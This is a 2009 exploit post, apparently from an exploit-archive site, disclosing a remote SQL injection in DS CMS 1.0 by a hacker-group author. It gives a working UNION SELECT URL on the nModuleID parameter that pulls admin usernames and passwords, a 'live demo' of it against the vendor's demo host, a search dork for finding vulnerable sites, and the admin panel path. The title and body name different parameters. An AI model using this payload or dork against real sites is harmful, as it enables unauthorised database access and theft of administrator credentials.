|    |    |    | Today: 21-Sep-2019 |

DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability

September 18, 2009 | Posted in ExploitAlert

###########################################################
[-]DS CMS 1.0 (nModuleID) Remote SQL Injection Vulnerability
###########################################################

[+]Author : M3NW5
[+]HomePage : http://www.indonesiancoder.com
[+]Contact : m3nw5@hackermail.com
[+]Location : INDONESIA

#######################################################
[-]Informations Script DS CMS 1.0
#######################################################

[+]Vendor : http://cms.dsinternal.com/
[+]script : DS CMS
[+]Version : 1.0



#######################################################

[+]Dork : Copyright © DigitalSpinners, 2009.
[+]Exploit : http://www.target.com/MoreNews.php?nModuleID=-180+union+select+concat_ws%280x3a,UserPass,UserName%29+from+admin_user_info--
[+]LiveDemo : http://www.cmsdemo.dsinternal.com/MoreNews.php?nModuleID=-180+union+select+concat_ws%280x3a,UserPass,UserName%29+from+admin_user_info--
[+]AdminPanel : http://www.target.com/AdminArea/AdminLogin.php

#######################################################
[-]Thanks to
#######################################################

[+] IndonesianCoder
Don Tukulesto . mistersaint . m364tr0n . gonzhack . cyb3r_tr0n
TUCKER . PETRUCII . bhand55 . denbayan . vYc0d . ran . Awink
[+] SurabayaHackerLink
Awan . Plaque . rey_cute . Tuex . XNITRO . DraCoola.com
[+] ServerIsDown
Jack- . Yadoy666 . kecemplungkalen . xshadow . H4ck3rKu
[+] Kill-9 Crew
kaMtiEz . Arianom

#######################################################
[-]Special Thanks to
#######################################################

Anggie Lestari . Stempy . rascal . m0m Dini
lope.lope.lope.lope dah pokoknye...!!!!
hhe . :)

Bokap . nyokap
babeh,enyak...maapin aye ye mau lebaran nih.
sekolahin gue lagi ngape,bosen gue di rumah,jnji dah kga bengal lagi. :(
masa iah gue kgag lulus SMA.

Taged in: injection, nfileid, Remote, vulnerability